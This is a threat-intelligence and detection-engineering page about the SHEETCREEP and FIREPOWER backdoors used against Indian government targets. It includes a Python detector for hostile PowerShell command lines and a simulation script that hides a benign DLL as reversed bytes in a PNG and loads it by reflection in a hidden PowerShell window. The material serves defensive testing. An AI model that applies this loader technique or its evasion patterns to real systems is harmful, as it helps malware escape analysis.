APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2
Summary
The report covers the Sheet Attack operation, which deployed three bespoke backdoors (SHEETCREEP, FIREPOWER, and MAILCREEP) to compromise Indian government organizations. The implants relied on legitimate cloud platforms for command-and-control, including Google Sheets, Firebase Realtime Database, and the Microsoft Graph API, which helped the activity blend into normal SaaS traffic. The analysis also notes artifacts consistent with the developers using generative AI to assist in producing code. The campaign is assessed as likely linked to a Pakistan-based subgroup of APT36.
Investigation
ThreatLabz conducted dynamic and static analysis of the backdoors, documenting persistence methods, C2 workflows, and data exfiltration behavior. The team also mapped the supporting infrastructure, observed geography- and User-Agent-based filtering, and captured code-level indicators suggesting AI-assisted code generation.
Mitigation
Implement layered detections for suspicious PDF/LNK delivery chains and monitor scheduled tasks that launch PowerShell or VBS executions. Apply strict egress controls and anomaly monitoring for cloud services commonly abused as C2, including Google Sheets, Firebase, and Microsoft Graph. Use hash-based blocking for known payloads and block the identified malicious domains and IP addresses.
Response
When detected, isolate the endpoint, terminate the hidden cmd.exe and PowerShell activity, remove the related scheduled tasks, and delete the backdoor binaries. Preserve and review the Google Sheets-based C2 logs and Firebase artifacts, then hunt for other hosts in the environment exhibiting the same indicators.
Attack Flow
Detections
- Download or Upload via Powershell (via cmdline)
- Microsoft Graph API Domain Resolved By Unusual Process (via dns_query)
- Suspicious Files in Public User Profile (via file_event)
- Suspicious GNU Wget Execution Attempt (via cmdline)
- Call Suspicious .NET Methods from Powershell (via powershell)
- Suspicious Execution from Public User Profile (via process_creation)
- Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns)
- Suspicious Extracted Files from an Archive (via file_event)
- IOCs (SourceIP) to detect: APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2
- IOCs (HashMd5) to detect: APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2
- IOCs (DestinationIP) to detect: APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2
- IOCs (HashSha1) to detect: APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2
- IOCs (HashSha256) to detect: APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2
- Detection of PowerShell Commands for SHEETCREEP and FIREPOWER Backdoor Deployment [Windows Powershell]
- Detection of SHEETCREEP and FIREPOWER Backdoor C2 Communication [Windows Network Connection]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
Attack Narrative & Commands:
- Stage the malicious PNG: the attacker creates a PNG file (details.png) that actually contains a compiled .NET assembly byte stream, but with its bytes reversed to evade static analysis.
- Launch PowerShell in hidden mode to load the assembly: the attacker runs PowerShell with -WindowStyle Hidden -Command and a one-liner that reads the reversed bytes, restores the correct order, loads the assembly via [System.Reflection.Assembly]::Load(), and invokes a known entry point (Task10.Program::MB()).
- Alternative LNK-based FIREPOWER deployment: a crafted .lnk shortcut executes powershell.exe with --headless -e (encoded script) to fetch and run a remote PowerShell backdoor.
These steps exactly match the strings the Sigma rule is looking for, ensuring the alert fires.
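As an added example (not from the original page or the Zscaler report), a small Python triage check that applies the command-line traits named in the narrative above to constructed Sysmon-style process-creation events, so a detection engineer can confirm which traits a given command line would trip before running the full regression test. The sample events, the indicator names and the verdict labels are assumptions made here.

```python
import re

# Constructed Sysmon-style process-creation events (made up for this example).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -Command "Get-Service | Where-Object Status -eq Running"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": ('powershell.exe -WindowStyle Hidden -Command "$b=[IO.File]::ReadAllBytes(\'details.png\');'
                     '[System.Reflection.Assembly]::Load([byte[]]($b[($b.Length-1)..0]))|Out-Null;'
                     '[Task10.Program]::MB()"')},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # placeholder base64 (UTF-16LE "AAAA..."), not a real encoded script
     "CommandLine": "powershell.exe --headless -e QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"},
    {"Image": r"C:\Program Files\App\app.exe",
     "CommandLine": "app.exe --plugin Load(details.png)"},
]

# The command-line strings the narrative says the Sigma rule keys on, as regexes.
INDICATORS = {
    "hidden_window":    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "reflective_load":  re.compile(r"\[System\.Reflection\.Assembly\]::Load\(", re.I),
    "reversed_bytes":   re.compile(r"\.Length\s*-\s*1\)\s*\.\.\s*0\s*\]"),
    "sheetcreep_entry": re.compile(r"Task10\.Program", re.I),
    "headless_encoded": re.compile(r"--headless\s+-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}
SHEETCREEP_TRAITS = {"hidden_window", "reversed_bytes", "sheetcreep_entry"}

def is_powershell(image: str) -> bool:
    return image.lower().rsplit("\\", 1)[-1] in ("powershell.exe", "pwsh.exe")

def classify(event: dict) -> tuple[str, list[str]]:
    """Return (verdict, matched indicator names) for one process-creation event."""
    if not is_powershell(event["Image"]):
        return "none", []                    # the rule is scoped to PowerShell images
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"])]
    if "reflective_load" in hits and SHEETCREEP_TRAITS.intersection(hits):
        return "sheetcreep_deploy", hits     # reflective load plus a SHEETCREEP trait
    if "headless_encoded" in hits:
        return "firepower_lnk", hits         # LNK-style encoded-script launcher
    if hits:
        return "suspicious", hits            # a single trait: weaker, but worth a look
    return "none", hits

def run(events=SAMPLE_EVENTS):
    return [classify(e) for e in events]

if __name__ == "__main__":
    for e, (verdict, hits) in zip(SAMPLE_EVENTS, run(SAMPLE_EVENTS)):
        print(f"{verdict:18} {hits}  <- {e['CommandLine'][:60]}")
```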
Regression Test Script:
# -------------------------------------------------
# SHEETCREEP payload simulation – reproduces the exact command line
# -------------------------------------------------
# 1. Create a dummy .NET assembly (simple C# hello world) and compile it.
#    The namespace and class must match the Task10.Program entry point invoked in step 3.
$source = @"
using System;
namespace Task10 {
    public class Program {
        public static void MB() { Console.WriteLine("Payload executed"); }
    }
}
"@
$tempDir = Join-Path $env:TEMP "sheetcreep"
New-Item -ItemType Directory -Force -Path $tempDir | Out-Null
$csFile  = Join-Path $tempDir "Task10.cs"
$dllFile = Join-Path $tempDir "Task10.dll"
$source | Set-Content -Path $csFile -Encoding UTF8

# Compile using csc (assumes .NET Framework SDK installed)
$cscPath = "$env:WINDIR\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
& $cscPath /nologo /target:library /out:$dllFile $csFile

# 2. Read the DLL bytes, reverse them, and write them to a .png file
$bytes    = [IO.File]::ReadAllBytes($dllFile)
$revBytes = $bytes[($bytes.Length-1)..0]
$pngPath  = Join-Path $tempDir "details.png"
[IO.File]::WriteAllBytes($pngPath, $revBytes)

# 3. Execute the exact malicious PowerShell command line (this will fire the rule).
#    Single quotes are used inside the -Command string so the outer double quotes survive
#    command-line parsing; the child process resolves details.png relative to $tempDir.
#    $b is written in a single-quoted PowerShell string here so it is not expanded by this script.
$maliciousCmd = '-WindowStyle Hidden -Command "$b=[IO.File]::ReadAllBytes(''details.png'');' +
                '[System.Reflection.Assembly]::Load([byte[]]($b[($b.Length-1)..0])) | Out-Null;' +
                '[Task10.Program]::MB()"'
# -WindowStyle and -NoNewWindow belong to different Start-Process parameter sets, so only -WindowStyle is used.
Start-Process -FilePath "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe" `
              -ArgumentList $maliciousCmd `
              -WorkingDirectory $tempDir `
              -WindowStyle Hidden

# Cleanup (optional, run after verification)
# Remove-Item -Recurse -Force $tempDir
Cleanup Commands:
# Remove temporary files and directories created for the test
$tempDir = Join-Path $env:TEMP "sheetcreep"
if (Test-Path $tempDir) { Remove-Item -Recurse -Force $tempDir }